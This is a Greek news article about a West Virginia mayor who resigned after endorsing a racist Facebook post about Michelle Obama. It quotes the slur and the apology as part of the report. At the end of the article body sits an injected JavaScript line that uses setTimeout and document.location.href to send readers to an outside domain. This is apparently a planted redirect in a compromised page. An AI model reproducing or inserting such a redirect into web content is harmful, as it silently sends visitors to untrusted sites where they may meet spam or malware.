Παραιτήθηκε δήμαρχος στη Βιρτζίνια για ρατσιστικά σχόλια κατά της Μισέλ Ομπάμα

0
21

 

Ρατσιστικά σχόλια εις βάρος της Πρώτης Κυρίας των ΗΠΑ Μισέλ Ομπάμα επιδοκίμασε η δήμαρχος της πόλης Κλέι στη δυτική Βιρτζίνια προκαλώντας σάλο στην αμερικανική κοινωνία αλλά και την παραίτησή της.

«Θα είναι αναζωογονητικό να έχουμε ξανά μια όμορφη, αξιοπρεπή και στιλάτη Πρώτη Κυρία στον Λευκό Οίκο. Έχω βαρεθεί να βλέπω τον πίθηκο με τακούνια», έγραψε στον λογαριασμό της στο Facebook η Πάμελα Ράμσεϊ Τέιλορ που εργάζεται στην κομητεία του Κλέι, αναφερόμενη στη σύζυγο του Τραμπ και νέας Πρώτης Κυρίας Μελάνια.

Η δήμαρχος του Κλέι Μπέβερλι Γουέλινγκ απάντησε στο σχόλιο αυτό: «Πάμ, μου έφτιαξες την ημέρα».Τα σχόλια αυτά έκαναν αμέσως τον γύρο του διαδικτύου προκαλώντας την αντίδραση αν και οι δύο γυναίκες έσπευσαν να τα διαγράψουν από τους λογαριασμούς τους.

Η Washington Post σημείωσε ότι η δήμαρχος υπέβαλε την παραίτησή της κι απέστειλε τη συγγνώμη της στην εφημερίδα: «Δεν είχα καμία πρόθεση να φανώ ρατσίστρια μέσω του σχολίου μου».

Επίσης, η Τέιλορ παύθηκε ως επικεφαλής της ΜΚΟ όπου εργαζόταν. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here